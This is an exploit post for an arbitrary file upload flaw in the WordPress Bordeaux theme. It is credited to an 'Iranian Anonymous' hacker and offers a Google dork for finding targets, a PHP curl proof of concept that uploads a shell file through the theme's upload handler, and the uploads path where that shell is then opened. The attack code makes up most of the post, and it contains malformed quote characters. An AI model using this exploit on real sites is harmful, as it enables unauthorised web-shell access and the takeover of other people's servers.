Wordpress pulgin bordeaux theme upload shell Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress pulgin bordeaux theme upload shell Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: wordpress pulgin bordeaux theme upload shell Vulnerability # Google Dork : inurl:/wp-content/themes/bordeaux-theme/ # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows # Version: all ########################## # Poc : <?php $uploadfile="upload.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>-@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print -$postResult"; ?> ########################## http://127.0.0.1/wordpress/wp-content/uploads/2016/09/upload.php ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: Hacker Khan </BODY></HTML>
